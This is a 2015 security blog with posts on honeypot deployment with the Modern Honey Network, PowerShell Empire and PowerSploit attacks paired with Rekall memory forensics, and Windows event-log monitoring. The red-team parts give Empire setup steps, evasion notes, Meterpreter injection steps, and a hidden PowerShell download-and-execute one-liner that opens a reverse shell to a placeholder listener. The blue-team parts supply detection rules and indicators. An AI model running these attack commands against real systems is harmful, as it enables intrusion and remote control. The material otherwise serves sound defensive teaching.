Sunday, September 27, 2015

Using the Modern Honey Network to Detect Malicious Activity

The Modern Honey Network

The Modern Honey Network (MHN) is an amazing honeypot framework created by the great team at ThreatStream. MHN simplifies honeypot deployment and data collection into a central management system. From MHN you can send output to an ELK instance, Splunk, or even an ArcSight-digestible format. I personally output the data to Splunk because MHN has also made an elegant Splunk application that renders MHN data quite nicely.

MHN comes with pre-built deployment scripts for the following honeypots:
  • Dionaea
  • Conpot
  • Kippo
  • Amun
  • Glastopf
  • Wordpot
  • ShockPot
  • Elastichoney
MHN also comes with scripts to install Snort and Suricata for IPS alerting as well as instructions to add additional honeypots to the framework. As mentioned earlier, the deployment scripts are designed to automatically feed their information back into MHN, which is then displayed within the MHN WebUI, ELK, ArcSight, or better yet, Splunk. Update: MHN also comes with p0f, which is not a honeypot but a passive OS fingerprinting tool.

Installation and Configuration

If you're interested in installing MHN on a server or VM you can follow the instructions by n0where.net. I installed MHN and the associated honeypots in Docker containers for convenience. This effectively isolates and compartmentalizes the services and allows multiple services that run locally on the same ports (such as 80 or 443) to be exposed on different "external" ports on the host machine.

To install MHN on Docker start a container with the following command:

docker run -p 10000:10000 -p 80:80 -p 3000:3000 -p 8089:8089 --name mhn  --hostname=mhndocker -t -i ubuntu:14.04.2 /bin/bash
*Note: 8089 is specified if you are using the Splunk forwarder. You can choose between 80 and 443 for the web interface. You can also make the host OS's port different from the Docker container's port by using [hostport]:[dockerport], which is convenient for honeypots.
Next, create and run the following script:
#!/bin/bash

set -x

apt-get update 
apt-get upgrade -y 
apt-get install git wget gcc supervisor -y 
cd /opt/ 
git clone https://github.com/threatstream/mhn.git 
cd mhn

cat > /etc/supervisor/conf.d/mhntodocker.conf <<EOF
[program:mongod]
command=/usr/bin/mongod
stdout_logfile=/var/log/supervisor/%(program_name)s.log
stderr_logfile=/var/log/supervisor/%(program_name)s.log
autorestart=true
autostart=true

[program:nginx]
command=/usr/sbin/nginx
stdout_events_enabled=true
stderr_events_enabled=true
autostart=true
autorestart=true

EOF

mkdir -p /data/db /var/log/mhn /var/log/supervisor

supervisord &

#Append a supervisorctl call so mongod is started when MHN's install_mongo.sh script runs
echo supervisorctl start mongod >> /opt/mhn/scripts/install_mongo.sh

./install.sh

supervisorctl restart all 
Don't forget to reference the host's IP address or hostname as the MHN server's IP during the ./install.sh script (not the docker container's IP address) unless you are using Docker's internal networking for Honeypot to MHN communication.
Unfortunately, due to the interactive nature of MHN's installation, supervisord is run manually in the background instead of as a proper service. To restart the container later use:
docker start <containerID> 
docker exec <containerID> supervisord &
To deploy a honeypot go to the 'deploy' section in the MHN WebUI and select your honeypot from the drop-down list. Then, either copy the wget command or the script contents and run either in your honeypot system. 
MHN Deployment Page


Installing honeypots in containers uses a similar but less complex method: create an Ubuntu 14.04 container with your host and internal port mappings, install the required services (such as wget, sshd, python, supervisord, etc.), and run the install command or script from the MHN deployment page above; a minimal sketch is shown below. There are trade-offs to installing honeypots in Docker containers, since some honeypots require direct interface access, which Docker supports but at a significant performance cost. So decide how important packet capture is to your installation and choose appropriately. I'm not going to go through the installation instructions for each container, but if needed I can provide guidance.
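As a rough illustration, the container for an SSH honeypot could be started like this. The image, names, and port mapping are arbitrary examples rather than values MHN requires, so adjust them to the honeypot you are deploying:
# Expose the container's internal port 22 on host port 2222
docker run -p 2222:22 --name sshpot --hostname=sshpotdocker -t -i ubuntu:14.04.2 /bin/bash
# Inside the container: install the basics, then paste the deploy command copied from the MHN 'Deploy' page
apt-get update && apt-get install -y wget python supervisor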

Run the following command to generate Splunk friendly output:
cd /opt/mhn/scripts/
sudo ./install_hpfeeds-logger-splunk.sh
This will log the events as key/value pairs to /var/log/mhn-splunk.log. This log should be monitored by the Splunk Universal Forwarder.
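Assuming a Universal Forwarder installed in its default location on the MHN server, adding the monitor looks roughly like this (the sourcetype name here is an assumption; use whatever the MHN Splunk app expects):
/opt/splunkforwarder/bin/splunk add monitor /var/log/mhn-splunk.log -sourcetype mhn-splunk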

To create an output for ArcSight run:
cd /opt/mhn/scripts/
sudo ./install_hpfeeds-logger-arcsight.sh
This will log the events as CEF to /var/log/mhn-arcsight.log

Now you have MHN installed with Honeypots feeding information into it. 
MHN Main Page

Configuring Honeypots

Once MHN is up and running, an important question to ask is where to deploy honeypots and for what purpose. There are primarily three locations where a honeypot can be installed:

1. Internally
Internal honeypots provide a low-noise, high-value alarm system that lets you know when someone is attacking your internal servers. In theory, nothing should ever hit your internal honeypots except perhaps vulnerability scanners, which you can whitelist from any alarm. I would recommend deploying Kippo, Conpot, Dionaea, and Amun (although Amun is a new addition to MHN and I haven't had the opportunity to play around with it yet) across your environment, and especially in high-value networks. I would also consider Shockpot and any other honeypot that mimics services you run internally, such as WordPot or Glastopf.

2. Externally
Opening an IP or specific ports on your firewall to honeypots can let you know who is scanning your perimeter environment looking for vulnerabilities. It is difficult to turn external scans into actionable alerts, though, since you will see both legitimate and illegitimate scans against your external addresses.

3. Globally
The third option is to rent a server in the cloud and place MHN honeypots on random public IPs. You can then compare this data against your external MHN data to try to determine who is randomly scanning the internet versus who is specifically targeting you. Although this is a very unscientific way of going about it, it cannot hurt to have more information for investigative purposes. This type of deployment is often used to gather generic threat data that is fed to IP/URL/hash blacklist databases.

Feeding Your Data into Splunk

I won't go into much detail about what reports to create with MHN's external and global data because I think that MHN has done a great job with the MHN Splunk application that I mentioned earlier. The application displays summary data for each of the honeypots on a dashboard home page.
Main MHN Splunk App page
Splunk Conpot Page
Splunk Dionaea Page
For a free and open source product, I'm pretty impressed by the work ThreatStream has put into MHN. I hope that they continue this trend.

What To Do With The Data

Honeypot data utilization relies heavily on the context of the data. Internal Honeypot hits are far more important to investigate than external or global hits. That said, some uses include:
  • When something unexpected hits an internal honeypot start an investigation ASAP.
  • A report of your top external honeypot hits to understand who's making the most noise, what they're trying to hit and how frequently they connect (a quick command-line approximation is sketched after this list). This will give you an idea of where to tighten security and how you can tailor your patch management program. It may also provide data points that can be used to narrow threat hunting efforts on the network (such as confirming that targeted attacks on the perimeter were all dropped and that no traffic from the malicious external IPs was allowed through).
  • An alert that takes the top 1000 global/external honeypot source IP addresses in the past month and compares them to your firewall traffic to see if any non-honeypot connection lasted longer than thirty seconds or contained more than 1MB of data.
  • Threshold alerts for when a particular source makes an unusually high number of connections to an external honeypot, say over 50-5,000 (depending on how popular you are).
  • Understand what countries your attackers are originating from to create rules looking for successful authentications/unusual connections from those geographic locations.
  • Identify what usernames attackers use to attempt automated authentication and ban them within your organization.
    • For my honeypot it's root, admin, test, user, MGR, oracle, postgres, guest, ubnt and ftpuser.
  • Identify what passwords authentication spammers use to try to authenticate to ensure that your password complexity rules meet minimum requirements.
    • For my honeypots it's 123456, password, admin, root, 1234, test, 12345, guest, default and oracle.
  • Collect packet samples of potentially malicious traffic for custom IPS signatures.
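As a quick example of the top-talkers report mentioned above, the key/value log lends itself to command-line summaries. A minimal sketch, assuming the field is named src_ip; check an actual line from your deployment and adjust the pattern accordingly:
# Top 20 source IPs seen across all honeypots
grep -o 'src_ip="\?[0-9.]*' /var/log/mhn-splunk.log | cut -d= -f2 | tr -d '"' | sort | uniq -c | sort -rn | head -20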

If you enjoy this post/project please be sure to thank the MHN project and volunteers and to support the Honeynet Project.

P.S. Check out this great introduction video by Jason Trost.

Wednesday, September 23, 2015

Empire Post-Exploitation Analysis with Rekall and PowerShell Windows Event Logs

In my last blog entry I explored some post-exploitation possibilities using PowerShell and Matt Graeber's repository of penetration testing tools, PowerSploit. PowerSploit, like PowerTools, is a set of fantastic scripts capable of accomplishing siloed tasks; however, they lack the modularity and plug-ability of a complete framework. Today I want to talk about a relatively new entrant to the field—PowerShell Empire.

Although Empire is only a couple of months old, the developers (who also worked on Veil) have built an impressive lightweight management architecture that borrows heavily from projects like PowerSploit and PowerTools to create a "pure PowerShell post-exploitation agent built on cryptographically-secure communications and a flexible architecture." While working with it the past couple of days I have found that it has a familiar workflow for those who are accustomed to Metasploit, making it easy to use for penetration testing Windows environments.

I have used Metasploit for many years, dabbled with Core Impact, and explored Armitage/Cobalt Strike at great length. These are all fantastic frameworks that are incredibly extensible, have strong community support and regular development release cycles. But the PowerSploit framework isn't exactly 'built-in' to those solutions (Cobalt Strike allows you to import modules, making it perhaps the easiest to extend in terms of PowerShell-based attacks). I've had a few conversations recently with people who are unsure about what framework they should be using and my answer is always the same: it depends. What you select is largely dependent on financial limitations and objectives, but in the end it is probably best that you get familiar with all of these offerings.

There are a couple of key features in Empire:
  • Invoke-Expression and WebClient download cradles allow you to stay off disk as much as possible. Evading on-access scanners is crucial, and leaving as few forensic artifacts as possible is just good tradecraft.
  • The agent beacons in a cryptographically secure manner and in a way that effectively emulates command and control traffic.
As penetration testers our goal should be to effectively mimic real-world attack methodologies, network traffic and end-point activity to provide clients with a set of indicators of compromise that can be effectively used to identify monitoring gaps. Tools like Empire help to push these ideas forward and reduce the latency between attacker innovation and defender evolution.

In this post I want to demonstrate how to use Empire, conduct basic IR memory analysis (in the same format as my previous article) and, more importantly, highlight some discussion around automated detection at the network and host level.

Red Team

I used Kali (2.0) for my server but I'm sure this would work on most Debian based distributions.
git clone https://github.com/PowerShellEmpire/Empire.git
cd Empire/setup
./install.sh
Simple. To launch Empire, execute the following command from the Empire root directory with the -debug switch enabled to ensure logs are stored for troubleshooting and tracing your activity:
./empire -debug
Empire uses the concept of listeners, stagers and agents. A listener is a network socket instantiated on the server side that manages connections from infected agents. A stager is the payload you intend to deliver to the victim machine. To access your listeners simply type ‘listeners’ to enter the listeners context, followed by ‘info’.

There are a few important values to note here. First, you can specify a KillDate and WorkingHours to limit agent and listener activity based on project limitations. I have certainly worked on a number of engagements in which a client had very specific restrictions about when we could work, so these options would have proved invaluable.

Second, the DefaultJitter value will help evade solutions that attempt to identify malicious beacon patterns that occur at a constant interval, and imply scripted or machine like activity that obviously stands out from natural human browsing patterns. There is also a DefaultProfile that defines the communication pattern that the agent uses to beacon home, which we will talk more about later.

Third, define variables using 'set [variablename] [value]' syntax, and activate the listener with the 'execute' command. Type 'list' to verify that the listener is active and a network socket has been opened.
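A typical exchange looks roughly like the following (the prompt and option names reflect the Empire build available at the time of writing; run 'info' to see exactly what your version exposes):
(Empire: listeners) > set Name test
(Empire: listeners) > set Host http://192.168.1.100:8080
(Empire: listeners) > set DefaultJitter 0.3
(Empire: listeners) > execute
(Empire: listeners) > list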

Logically, the next step is to define a payload and select a payload delivery mechanism. Type 'usestager' followed by TAB+TAB to see a list of options.


The two options that are best suited for payload execution are launcher and macro. Launcher will generate a PowerShell one-liner (Base64-encoded or clear text) that automatically sets the required staging key/listener values. Macro creates an Office macro with the appropriate callback values to establish a connection with the listener. This can be embedded in an Office document and used in social engineering attacks as a payload delivery mechanism.

To select a stager type 'usestager [stagername] [listenername]' followed by 'execute'


In the image above you can see that the listener callback details are embedded in the script, and a (possibly) hard-coded value of /index.asp is used for the agent GET request. The session value for the agent is included. Base64 encoding the script means it is passed via PowerShell's '-Enc' (EncodedCommand) flag and decoded at run-time, making investigation and traceability more difficult (again, simulating a real breach).

After executing this one-liner on our victim machine you will receive a callback notification that a new connection has been established. You can observe active agents by typing 'agents' followed by 'list'. 

Now that a connection is established you can type 'interact [agentname]' to hop into an agent session similar to Meterpreter. Enter 'usemodule' followed by TAB+TAB to see all available options. You can identify privilege escalation opportunities, move laterally, establish persistence, steal tokens/credentials, install key-loggers and run all of the amazing post-exploitation tasks available from the PowerSploit/PowerTools exploitation kits. I don't want to go into detail for each of these modules as it is not the intent of this post. I simply wanted to demonstrate how to get up and running to encourage more offensive-security professionals to embrace this tool.

Blue Team

My objective for the defensive aspect of this post is to conduct some high level analysis of the tool itself and the general methods it employs. There are a lot of modules available and of course each of these may leave behind specific indicators of attack/compromise but it's not my goal to go into each of them for this post.

Let's take a look at some of the network traffic first.


We see that after the initial stager is executed our first connection is established. On its own this is an extremely poor indicator. GET requests to /index.asp are going to be very common on any network. However, it does appear to be a hard-coded value and it's important to gather as much information as possible. 

After this initial connection a second stage payload is downloaded, key negotiation occurs, an encrypted session is established and the agent starts beaconing. This beacon is characterized by the DefaultProfile variable set for the listener running on the Empire server. 

We can see the beacon issues 3 GET requests within a short period of time during a call home interval. The requests are sent to /news.asp, /admin/get.php, /login/process.jsp and have a generic Mozilla User-Agent.

Again, individually each of these actions appears benign and alerting on it would generate a significant number of false positives (which is the intention of the framework). If we look at this traffic collectively, we could design a network IDS rule that alerts when a connection is made to /index.asp and is shortly followed by GET requests to at least two of the URIs shown in the image above.

Moreover, many organizations may issue tight controls around the type of browser that can be installed, and it is unlikely to see a Windows server with Firefox running. If you are a system administrator who has implemented application white-listing and your users should only be using IE, the presence of a Mozilla Firefox, Chrome, or Opera User-Agent indicates a policy violation (best case scenario) or a manually crafted UA (worst case, possibly indicating malware). In any event, it is possible to at least use this information to profile other infected hosts even if it doesn't serve as a point of initial detection. It's good to have options.

Of course all of this can be customized in Empire, so from a heuristic perspective I think the important take away really is recognizing the pattern itself and not necessarily the specific implementation of that pattern. That is a little bit esoteric so let's try and gather more information from the host.

Dave recently published a two part series on Windows event monitoring. This is a fantastic starting point for most organizations, especially those who are new to SIEM. I still come across a lot of environments that do not have any formal log management program, let alone a properly deployed SIEM with a good alerting framework that has been adequately tuned. For most companies, implementing monitoring for the event IDs Dave highlighted is a good objective. But for those with a more mature security program, I think it's important to start looking at PowerShell events.

PowerShell 2.0 is the version installed by default on Windows 7 and Server 2008 R2 (earlier Windows versions do not ship with PowerShell by default), and unfortunately it does not provide much information from a logging perspective.

There are primarily two log files that are accessible:
  • Windows PowerShell (the classic log)
  • Microsoft-Windows-PowerShell/Operational
It is also possible to enable analytic and debug logging; however, this is fairly noisy and resource-intensive. Open Event Viewer and select View -> Show Analytic and Debug Logs, then browse Applications and Services Logs -> Microsoft -> Windows -> PowerShell, right-click Analytic and enable it. I don't think there is a lot of value add here, but it can be useful when debugging a script or troubleshooting a problem.
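The same toggle can be flipped from an elevated command prompt, something along these lines (a sketch; the channel name should match what Event Viewer shows):
wevtutil sl Microsoft-Windows-PowerShell/Analytic /e:true /q:true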

In the 2.0 version of the Microsoft-Windows-PowerShell/Operational log you will have the following events of interest:
  • 40961 - Console is starting up
  • 40962 - Console is ready for user input
These logs do contain metadata such as the user who performed the event and the computer it was executed on, but it is pretty limited. If you do not use PowerShell in your environment (even small organizations have use cases, so this is unlikely) then perhaps alerting on one of these events may be useful, but there is very little contextual data stored in the event log to indicate what was done while the console was accessed.

The classic Windows PowerShell log in version 2.0 of PowerShell will often generate these event IDs:
  • 600 - Provider Life-cycle
  • 400 - Engine Life-cycle
  • 403 - Engine Life-cycle
Again these events are fairly nondescript and provide little information. 

Event ID 5156 from the Windows Security audit log can provide some additional information regarding network connections if we filter effectively and alert on outbound, external connections generated by applications like powershell.exe.


None of these indicators are of any substantial quality, but thankfully Microsoft introduced some improvements in version 3.0 of PowerShell (no additional changes to event logging functionality in version 4.0 or 5.0 unfortunately).

After upgrading to PowerShell version 3.0 you can specify a GPO setting to turn on module logging for Windows PowerShell modules in all sessions on all affected computers. Pipeline execution events for the selected modules will then be recorded in the PowerShell event logs I covered earlier. You can also enable these values interactively, as shown in the image below.
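If Group Policy isn't an option, the equivalent values can be set directly in the registry. A minimal sketch, assuming the standard policy paths (verify against your own environment before relying on it):
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging" /v EnableModuleLogging /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging\ModuleNames" /v "*" /t REG_SZ /d "*" /f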
If we now execute our PowerShell Empire one-line stager we will have more event log data to work with. Event IDs 4103 and 800 are recorded and contain a veritable wealth of information that can be used to detect suspicious activity. 
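To spot-check for these events from an elevated prompt, queries along these lines work (log names as they appear in Event Viewer; adjust the count and filters to taste):
wevtutil qe Microsoft-Windows-PowerShell/Operational /q:"*[System[(EventID=4103)]]" /c:5 /rd:true /f:text
wevtutil qe "Windows PowerShell" /q:"*[System[(EventID=800)]]" /c:5 /rd:true /f:text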

At this point we can launch Rekall, list processes, identify suspect network connections, dump process memory and perform keyword string searches.

This is a similar workflow to my prior post. In large memory dumps it can be difficult (and time-consuming) to navigate or CTRL+F search through a document for specific keywords. Mark Russinovich's strings can greatly reduce this work effort, but a better solution in my opinion is to write Yara rules and use them in conjunction with Volatility. If you aren't familiar, Yara is a tool designed to help execute binary or textual pattern-match searches. Writing rules is straightforward as the syntax is easy to pick up. Save the following to a text file with the .yara extension.

rule example : powershell

{   
     meta:
           Description = "Look for suspect powershell artificats."
           filetype = "MemoryDump"         
           Author = "Greg Carson"
           Date = "09-09-2015"
    
     strings:
           $s0 = "Invoke-" ascii
           $s1 = "-Enc" ascii

     condition:
           2 of them
}


This can then be imported to perform a search in Volatility:
vol.py -f image.raw --profile=Win7SP1x64 yarascan -y yarafilename.yara -p 7860

The workflow demonstrated on the Blue Team side of things isn't necessarily in any order. Ideally, you would have a SIEM rule trigger based on a suspicious pipeline execution PowerShell event (that has appropriate filters and suppression enabled), which results in an investigation of network traffic prior to and shortly after the event and is followed by a more thorough live memory forensic analysis of the system and others it may have had contact with. But this may not be possible depending on the environment you find yourself in. It's important not to rely on any one single security solution as the indicators of attack will often exist in many different places and across disparate entities that solve different problems.

EDIT:
@tifkin_ contacted me to mention an additional tool from Mark Russinovich titled 'Sysmon'. It's a little bit outside the scope of this post, but the tool itself shows a lot of promise; I'd recommend defenders look into it.

Monday, September 21, 2015

Spotting the Adversary with Windows Event Log Monitoring, Part II

Events to Monitor in a Windows Environment

Part II

Recently, in part I of Spotting the Adversary with Windows Event Log Monitoring, I walked you through the first half of the NSA's guide to spotting malicious behaviour using Windows event logs. In part II I will go through the second half of the guide:
  9. AppLocker
  10. System or Service Failures
  11. Windows Update Errors
  12. Kernel Driver Signing Errors
  13. Group Policy Errors
  14. Mobile Device Activities
  15. Printing Services
  16. Windows Firewall

9. AppLocker

Windows 7/2008R2 introduced Microsoft's AppLocker, which Microsoft describes as:
AppLocker is a new feature in Windows Server 2008 R2 and Windows 7 that advances the features and functionality of Software Restriction Policies. AppLocker contains new capabilities and extensions that allow you to create rules to allow or deny applications from running based on unique identities of files and to specify which users or groups can run those applications.
It is a great product for restricting which software is authorized to run on a user's machine or production server. As such, when AppLocker is deployed, reports and alerts should be configured to notify you when an AppLocker violation occurs. Recommended alerts include:
  • Alerts on AppLocker violations on production servers outside of change windows
  • Reports on all user AppLocker violations
Table-1: AppLocker Blocked Events
The server alert, of course, depends on the size of your environment and control over the machines. If this is unreasonable, you may want to focus the alert on high-severity servers and create a report for everything else.

10. System or Service Failures

This is a difficult set of alerts/reports to properly utilize. A system or service failure should not happen on a regular basis. That said, something in my personal security environment seems to fail every other day. On the other hand, if a Windows service continues to fail repeatedly on the same machines, it may indicate that an attacker is targeting the service.

Table-2: System or Service Failures
My recommendation is to focus on the absolute highest-severity systems first: run a report of system/service failures for the first couple of weeks, get a feel for your environment, and then create alerts/reports depending on its stability, because one malfunctioning system crashing every couple of minutes or hours can make your entire SIEM environment noisy and something to ignore instead of respond to.

11. Windows Update Errors

Depending on how your environment's update policy is applied, an ad-hoc or scheduled report should be created to identify Microsoft Windows Update failures. Typically my recommendation is at least a report, and an alert for high-severity assets if constant diligence is a factor.

Table-3: Microsoft Windows Update Errors

12. Kernel Driver Signing Errors

Microsoft introduced kernel driver signing in Windows Vista 64-bit to improve defense against inserting malicious drivers or code into the kernel. Any indication of a protected driver violation may indicate malicious activity or a disk error and warrants investigation; however, much like the system or service failures, I recommend creating a report and monitoring your environment for a few weeks to ensure that there are no repeat offenders that will spam your SIEM alerting engine.

Table-4: Kernel Driver Signing Errors

13. Group Policy Errors

Microsoft's built-in group policy functionality is an amazing way to ensure consistent security and configuration properties are applied to all Windows domain machines within your environment. The inability to apply a group-policy setting should be investigated immediately to determine the source. Depending on the size of your domain and frequency of GPO updates, I may recommend a report over an alert just because one failure across your domain could provide thousands of alerts instantly.

Table-5: Group Policy Errors

14. Mobile Device Activities

Mobile activities on a system are part of daily operations, so there is no need to report or alert directly on them. However, an abnormal number of disconnects or wireless association status messages may indicate a rogue wifi hotspot attempting to intercept your user's wireless traffic. Therefore, it may be important to log mobile activity traffic, and, if your SIEM is capable, to create a threshold or trending alert to notify you when there are an above-average number of mobile events.

Table-6: Mobile Device Activities

15. Printing Services

Microsoft Print Service events are more of a good-to-have, useful for tracing who printed what in case of an internal data leak. That said, the massive volume of events that a print server can generate makes tracking printing events prohibitive (I have seen print servers generate more events than an Active Directory server.) If possible, you may wish to offload printer events to a log server instead of a SIEM for historical retention. A simple SNARE/ELK/Syslog-NG solution may work very well.

Table-7: Printing Services

16. Windows Firewall

Windows Firewall modifications or service status changes should not take place outside of a change window or Windows update. As such, an alert indicating a firewall policy modification or status change is recommended for servers and high-severity assets. A report for user activities may be prudent depending on whether your users have administrative access or not (hopefully not!)

Table-8: Windows Firewall
There you have it. The NSA's Spotting the Adversary with Windows Event Log Monitoring is an excellent starting guide for alerts/reports in a new SIEM environment. My only complaint is that they forgot Windows scheduled tasks, which are often used by malicious entities for privilege escalation, malicious code execution, etc. Otherwise, hopefully between the NSA's original guide and this breakdown you have a healthy set of alerts and reports to start with.

Friday, September 18, 2015

Triaging PowerShell Exploitation with Rekall

David recently published his article Spotting the Adversary so I figured I'd continue the trend and focus on Blue Team tactics in this post.

I've spent a fair bit of time in EnCase. They have a great product and a number of solutions to fit most of your needs, but at times it can feel bulky and a little stiff. Moreover, it has an arguably non-intuitive user interface and is an expensive solution that a lot of organizations cannot afford. Volatility is fantastic but for this post I wanted to focus specifically on Rekall. Incident Response and Forensics require a superb understanding of operating system internals, file system structures, and malware behavior patterns, but tools like Volatility and Rekall greatly reduce the barrier to entry for security analysts and service providers.

Rekall is a complete end-to-end memory forensics framework (branched from Volatility itself). The developers of this project wanted to focus on improving modularity, usability, and performance. One of the most significant advantages to using Rekall is that it allows for local or remote live forensic analysis. For this reason it is a core component of the Google Rapid Response tool.

In this article I wanted to document a common offensive tactic and then briefly step through some investigatory steps. This is by no means a complete incident response process, and the scenario assumes the attacker has some level of access to the system or network already.

Red Team

I am a big fan of Matt Graeber's PowerSploit. PowerSploit is essentially a set of PowerShell scripts designed to aid penetration testers during all phases of an assessment. You can use it to inject DLLs, reflectively load PE files, insert shellcode, bypass anti-virus, load Mimikatz and do all sorts of other wonderful and nefarious things. PowerShell has become extremely popular as an attack vector in the last two years as it is a native trusted process, lacks comprehensive security mechanisms (excluding perhaps the most recent versions), and is an extremely powerful scripting language (direct API support for Windows internals).

In our scenario we assume that the attacker has a limited shell and wants to gain more significant access. First let's set up our listener:
I've elected to use the Reverse_HTTPS Meterpreter payload as the PowerSploit Invoke-Shellcode script used later on only supports the Reverse_HTTPS and Reverse_HTTP variants (and as such it is preferable to pass this traffic over SSL).

On the compromised machine we will now execute a PowerShell one-liner to retrieve the Invoke-Shellcode PS1 script from the PowerSploit GitHub page. This is a nice method of retrieval as GitHub is not a suspicious or inherently untrustworthy page and the request is submitted over HTTPS (which can help with evasion at the URL filtering/web traffic content inspection layers). Additional levels of evasion can be employed by encrypting our PS1 script but I'm not going to explore that option for the purposes of this demo.
What's happening here? PowerShell creates a new WebClient object, calls its DownloadString method to retrieve the script over HTTPS, and passes the result to IEX (Invoke-Expression) to execute it in memory. Invoke-Shellcode is then run with the switches that will instantiate a connection to our MSF listener. This is all executed in the context of the PowerShell process itself.
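For reference, a one-liner of this shape looks roughly like the following. The repository URL and listener address are placeholders, and the Invoke-Shellcode parameters reflect the PowerSploit version of the time, so treat this as a sketch rather than the exact command from the screenshot:
powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/<path-to>/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost <listener-ip> -Lport 443 -Force"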

In Metasploit we see that a session is established, and we migrate processes. In this example I am migrating to Notepad. This is not good tradecraft and I'm only doing it to make things more discernible and easy to grasp forensically in the next section.
At this point we can start looking at things from the other perspective.

Blue Team

First let's drop WinPMem on the system. WinPMem is a kernel-mode driver that allows us to gain access to physical memory and map it as a device.
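Loading the driver is a single command; the binary name and version vary by release, so treat this as a sketch and check the usage output of whichever build you dropped on the box:
winpmem_1.6.2.exe -l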
Once this is done we can use Rekall to perform live memory forensics on the system. Navigate to your Rekall install directory and run the following command to mount the WinPMem device:
rekall.exe -f \\.\pmem
This will launch a Rekall interactive console.  Rekall has support for a lot of native plugins (that you are likely familiar with if you have ever used Volatility). Typing plugins. [tab] [tab] will print a list of options. To get additional information type plugins.[pluginname]? Many plugins also have switches that allow you to filter your query based on a specified criteria. To see the list of available switches type pluginname [tab].

A good starting point is the netscan plugin. 
You should also run pslist when starting your analysis to understand what processes are running. Nothing out of the ordinary but as we continue to browse we see Notepad has a network socket established:
It is clear that this process has been hooked as Notepad should never establish network connections. Let's use the LDRModules plugin to detect unlinked DLLs.
We see a list of unlinked DLLs and some that stand out as extremely suspicious. So we know that Notepad was injected into by a different process (or spawned by malware using a technique known as process hollowing). Obviously for this example we know that Meterpreter migrated to this process.

Meterpreter has a fairly standard migration process:
  1. Identify the PID.
  2. Scan for architecture of target process.
  3. Check if the SeDebugPrivilege is set in order to get a handle to the target process.
  4. Calculate payload length.
  5. Call OpenProcess() to gain access to Virtual Memory of target process.
  6. Call VirtualAllocEx() to assign PAGE_EXECUTE_READWRITE.
  7. Call WriteProcessMemory() to write the payload into the target process allocated memory region.
  8. Call CreateRemoteThread() to execute the payload.
  9. Close the prior thread from the old Meterpreter session.
Knowing this, we look for additional suspect processes. I like to look for cmd.exe or powershell.exe and dump these processes' memory regions for string analysis. When I ran pslist earlier I identified a PowerShell process and ran the memdump pid=[PowerShellPID] plugin. This will produce a DMP file that you can load in your favorite editor.
I was able to find suspicious strings by searching for keywords such as 'IEX', 'Download', and other commands that might be used by an attacker. At this point I am able to extract the full PowerSploit script from memory and have identified that my attacker downloaded a Meterpreter stager. From an Incident Response perspective we have numerous Indicators of Compromise to work with.
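If loading the dump in an editor is too unwieldy, the same keyword hunt can be done from the command line. A sketch, with the dump filename as a placeholder for whatever memdump produced:
strings.exe -n 8 <pid>.dmp | findstr /i "IEX DownloadString WebClient"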

Lastly, Process Explorer from Mark Russinovich is a great tool for at-a-glance identification of suspect activity. Let's look at spawned threads and stack information from a normal Notepad process relative to a hooked one:
This is by no means a complex attack and there is much more we can do from a memory analysis perspective, but I think the material covered serves as a gentle introduction to the topic. I'll likely follow up on this post in the future and go into more depth but hopefully this information is enough to get you started.

There are a number of fantastic writers covering these types of topics in the blogosphere and I wanted to link to them here as they are all doing amazing work. I came across some great posts while doing research:
http://holisticinfosec.blogspot.ca/2015/05/toolsmith-attack-detection-hunting-in.html
http://www.tekdefense.com/news/2013/12/23/analyzing-darkcomet-in-memory.html
http://www.behindthefirewalls.com/2013/07/zeus-trojan-memory-forensics-with.html
https://github.com/volatilityfoundation
http://www.rekall-forensic.com/
https://github.com/google/grr
https://github.com/google/rekall/releases/tag/v1.3.2


Thursday, September 17, 2015

Spotting the Adversary with Windows Event Log Monitoring

Events to Monitor in a Windows Environment


OK, you have purchased a SIEM, added your Windows servers and you're ready to create your use-cases. You draw a blank. The amazing part about a SIEM is that you can build use-cases for literally thousands of scenarios. Unfortunately, the problem with a SIEM is that you have to create tens of thousands of alerts to monitor said use-cases. Monitoring for five failed logins followed by a successful login is great, but what good is the alert if the account locks after three failed attempts? Or if you have 10,000 users to monitor? To add to this, according to Verizon's 2013 Data Breach Investigations Report, 76% of breaches involved stolen or weak credentials. So what should you monitor for?

I find that it is often best to start with the basics--to report and/or alert on basic system functionality at the start, and to build more advanced use-cases based on abnormal behaviour outside of your company's policies.

Fortunately, the friendly folks at the NSA have written Spotting the Adversary with Windows Event Log Monitoring, a great guide that walks you through what they have determined are the 16 primary categories to focus on within Windows event logs to ensure system security. We will be going through the first eight in part I, and the second eight in part II.
  1. Clearing Event Logs
  2. Account Usage
  3. Remote Desktop Logon Detection
  4. Windows Defender Activities
  5. Application Crashes
  6. Software and Service Installation
  7. External Media Detection
  8. Pass the Hash Detection
  9. AppLocker
  10. System or Service Failures
  11. Windows Update Errors
  12. Kernel Driver Signing
  13. Group Policy Errors
  14. Mobile Device Activities
  15. Printing Services
  16. Windows Firewall
Before I start I want to clarify a not-so-obvious gotcha about Windows event logs for newcomers--Windows NT to Windows 2003 event IDs are identified by three digits, whereas Windows Vista/Windows 2008 and beyond use four-digit IDs. Therefore, any event ID with three digits is only applicable to Windows 2003 and before (and four digits to anything after 2003). Another useful resource is Randy's Ultimate Windows Security, which provides detailed information on nearly every Windows security event.

1. Clearing Event Logs

This is often the first alert I will install in a client's environment. There are very few legitimate reasons to clear the audit log directly; if the audit log is too large, the event log's maximum size should be reduced instead. Outside of an improperly configured device, an event log would only be cleared to hide malicious activities. As such, a simple alert looking for the following events is usually sufficient.
Table-1: Event Log Cleared
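For a quick manual check outside of the SIEM, the relevant events can be pulled from the command line. A sketch, assuming the commonly referenced IDs (1102 for a cleared Security log, 104 for a cleared System/Application log):
wevtutil qe Security /q:"*[System[(EventID=1102)]]" /c:5 /rd:true /f:text
wevtutil qe System /q:"*[System[(EventID=104)]]" /c:5 /rd:true /f:text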

2. Account Usage

A proper set of alerts and reports for improper account activity is key to a useful SIEM. Setting an alert for X failed logins may drive your SOC crazy every Monday morning after a long weekend, but setting this threshold to alert when it occurs after-hours or on non-user systems could indicate malicious behaviour.

The size of your environment and your company's security policies will weigh heavily on whether a certain action warrants an alert or a report--a team of 200 may have a weekly report on created users, whereas a team of 20,000 may have a daily report. As such, I will make my recommendations based on generalizations of a business with 1,000 users:

